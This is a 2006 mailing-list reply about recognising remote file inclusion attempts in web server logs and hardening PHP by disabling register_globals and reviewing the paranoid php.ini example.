On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote: > Hello! > > >http://jesusch.de/~jesusch/tmp/access.log > > There are many log entries with "something=http://" style > pattern. These are common attack methods against default configured > servers with poorly written applications. Many of these rely on > register_globals=on php.ini setting. Turn it off first globally. > This may break some old PHP apps, but you can turn it back on > in virtualhosts locally. PHP users might want to browse the paranoid ini configuration for PHP available at /usr/share/doc/php5-common/examples/php.ini-paranoid The comments in that configuration file might be enlightening. It might also be a good excercise to do this: $ diff -u /usr/share/doc/php5-common/examples/php.ini-dist \ /usr/share/doc/php5-common/examples/php.ini-paranoid |less (Notice that the paranoid configuration file might not be fully up-to-date with the latest variables available so the diff will catch both the changes to the default variable values as well as the variables that are missing in the paranoid configuration file) Regards Javier
Attachment:
signature.asc
Description: Digital signature